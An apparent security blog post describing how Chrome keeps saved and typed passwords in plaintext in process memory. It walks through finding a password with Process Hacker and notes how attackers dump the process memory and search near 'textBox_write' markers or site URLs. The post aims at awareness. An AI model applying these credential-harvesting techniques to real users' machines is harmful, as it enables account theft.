Chrome: LOLBin For Attackers

Introduction

Hello, respectful readers. I love Chrome for its rich feature. But, web browsers like Chrome stores our passwords in memory as plaintext. Although Chrome refused to fix the issue because, attackers can exploit this, only if they already compromised your system. Let's discuss on it.


Comparing To File

Chrome stores user password in encrypted format when storing in file system. For example, ChromeData.db file stores user passwords in encrypted format. And to decrypt it, attackers need to extract key from the Local State file (which also needs to be decrypted using win32crypt.CryptUnprotectData function). On the other hand, passwords in memory are all in plaintext.


Get Facebook Password

Let's see- how Process Hacker tool can be used to view an user's Facebook password. Suppose, the user is logged in to Facebook (or Facebook password is saved in Chrome). Now open the Process Hacker and double click on the Chrome process. A new window will be opened-


Now, click on Strings... button, input the minimum length and hit OK. A new window will be opened like below-


Now, click on the Filter button then, click Contains... and enter the user's Facebook password. Now press OK.


You'll now see the user's Facebook password. In my case, the password is in multiple addresses of memory. Just imagine, anyone can view this-


How Attackers Steal

Above, I showed- how we can find plaintext passwords using Process Hacker. But, attackers don't already know your password! Then how can they search your password? Okay, they will first dump the Chrome process memory or, access it from another process (i.e. using ReadProcessMemory function). Suppose, an attacker dumped the Chrome memory and got the .dmp file. In my research, when I opened the .dmp file in a hex editor, I found that, passwords or emails are usually found-

 After textBox_write string.

 After the website URL.


Although, these structures are changed most often by browsers. More details can be found here.


Summary

The issue I described here is not new. In 2015, a security professional shared this issue in his blog post. By using this method, an attacker not only can steal passwords but also your search history, recent webpages etc. Imagine, an attacker can compromise all your online accounts only by having local access! Even after you close the browser tab!


Md. Abdullah Al Mamun

Cyber Defence Engineer, CyDefOps